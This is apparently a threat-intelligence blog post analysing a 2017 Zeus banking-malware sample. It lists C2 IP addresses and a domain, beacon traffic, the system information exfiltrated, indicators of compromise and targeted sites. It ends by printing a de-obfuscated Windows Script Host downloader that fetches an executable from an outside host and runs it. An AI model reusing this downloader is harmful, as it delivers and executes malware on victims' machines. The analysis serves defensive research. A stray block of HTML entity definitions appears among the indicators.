Header Ads

PhishCentral is a resource for all security researchers with a focus on phishing and spam related malware. All information provided at this site is to be used only for research and learning. If you want samples of the malware reported on this site for further analysis and research, send your requests to samples@phishcentral.com

Malware - Zeus | Apr 2017

Here're some of the characteristics of a current version of the Zeus Banking Malware.

Upon execution, the process that is spawned is explorer.exe which then executes and does the job.



PDB files (from memory, not all are created by the malware):

explorer.pdb
ntdll.pdb
kernel32.pdb
kernelbase.pdb
RSDSqc
apphelp.pdb
msvcrt.pdb
RSDS~S
oleaut32.pdb
RSDSzNh
combase.pdb
RSDS,9%
powrprof.pdb
advapi32.pdb
RSDSGk
user32.pdb
gdi32.pdb
shcore.pdb
RSDSB*
shlwapi.pdb
shell32.pdb
RSDSmEi? r
UxTheme.pdb
dwmapi.pdb
twinapi.pdb
d3d11.pdb
dcomp.pdb
sspicli.pdb
sechost.pdb
userenv.pdb
propsys.pdb
rpcrt4.pdb
SLC.pdb
profapi.pdb
dxgi.pdb
sppc.pdb
imm32.pdb
msctf.pdb
ws2_32.pdb
nsi.pdb
RSDSS=[
dnsapi.pdb
RSDS}=
wininet.pdb
iertutil.pdb
cryptsp.pdb
rsaenh.pdb
bcrypt.pdb
cryptbase.pdb
bcryptprimitives.pdb
secur32.pdb
OnDemandConnRouteHelper.pdb
Kernel.Appcore.pdb
winhttp.pdb
urlmon.pdb
ole32.pdb
RSDS9h
mswsock.pdb
iphlpapi.pdb
RSDSh1
winnsi.pdb
rasadhlp.pdb
RSDSuY
fwpuclnt.pdb
comctl32.pdb

C2 information:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
HTTP/1.1
Connection: close
urlmon.dll
ObtainUserAgentString
185.121.177.53
185.121.177.177
45.63.25.55
111.67.16.202
142.4.204.111
142.4.205.47
31.3.135.232
62.113.203.55
37.228.151.133
144.76.133.38


HTTP connections:



http://health.worldwidecons.ltd/index.php
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
health.worldwidecons.ltd
/index.php

health.worldwidecons.ltd
health.worldwidecons.ltd
C:\Windows\System32\rasadhlp.dll
health.worldwidecons.ltd
health.worldwidecons.ltd
LRPC-4ad3f41e1dd17fdfd8
LRPC-4ad3f41e1dd17fdfd8
LRPC-ce28dc8b8c59856b80
Accept: */*
UserName
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

http://health.worldwidecons.ltd/index.php
qqqqqqqqqqqqqqqq
health.worldwidecons.ltd
POST /index.php HTTP/1.1
Host: health.worldwidecons.ltd
dtl.snocediwdlrow.htlaeh
health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
health.worldwidecons.ltd
POST /index.php HTTP/1.1
dtl.snocediwdlrow.htlaeh
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

System info sent back to the C2:

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\User\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=WIN-P63U3EMH5QC
ComSpec=C:\Windows\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\User
LOCALAPPDATA=C:\Users\User\AppData\Local
LOGONSERVER=\\WIN-P63U3EMH5QC
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 70 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4601
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\User~1\AppData\Local\Temp
TMP=C:\Users\User~1\AppData\Local\Temp
USERDOMAIN=WIN-P63U3EMH5QC
USERDOMAIN_ROAMINGPROFILE=WIN-P63U3EMH5QC
USERNAME=User
USERPROFILE=C:\Users\User
windir=C:\Windows

Misc information (can be used as IOCs):



Cookie:username@windowssearch.com/
Cookie:username@wireshark.org/

Connection: close
X-Powered-By: PHP/5.4.45-0+deb7u2




<!ENTITY RightTeeArrow "&#x21A6;">
<!ENTITY mapsto "&#x21A6;">
<!ENTITY DownTeeArrow "&#x21A7;">
<!ENTITY mapstodown "&#x21A7;">
<!ENTITY larrhk "&#x21A9;">
<!ENTITY hookleftarrow "&#x21A9;">
<!ENTITY rarrhk "&#x21AA;">
<!ENTITY hookrightarrow "&#x21AA;">
<!ENTITY larrlp "&#x21AB;">
<!ENTITY looparrowleft "&#x21AB;">
<!ENTITY rarrlp "&#x21AC;">
<!ENTITY looparrowright "&#x21AC;">
<!ENTITY harrw "&#x21AD;">
<!ENTITY leftrightsquigarrow "&#x21AD;">
<!ENTITY nharr "&#x21AE;">
<!ENTITY nleftrightarrow "&#x21AE;">


Websites targeted

The list is very long - they are not leaving any industry out!
Here's just one snippet:



aa.net.nz
aafes.com
abm-energie.de
accretivehealth.com
aceinsurance.com.au
action-inter.com
activedocs.com
aeat.co.uk
afimilk.co.il
aftonxchange.com
agencerecherche.fr
agencywow.com
akd.nl
aksel.com.tr
albil.com.tr
allianz.hr
alturkigroup.net
ana.co.jp
aproposgeschenk.de

Here's one of the downloader de-obfuscated script BTW:

The code below is the part that grabs the payload from the c2 and executes it.
---------------------------
Windows Script Host
---------------------------
var wsh = new ActiveXObject("wscript.shell");

var sh = new ActiveXObject("shell.application");

var HTTP = new ActiveXObject("MSXML2.XMLHTTP");

var Stream = new ActiveXObject("ADODB.Stream");

var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";

HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false); HTTP.Send(); if (HTTP.Status == 200) {

Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);

Stream.Position = 0; Stream.SaveToFile(path, 2);

Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }
---------------------------

No comments:

Powered by Blogger.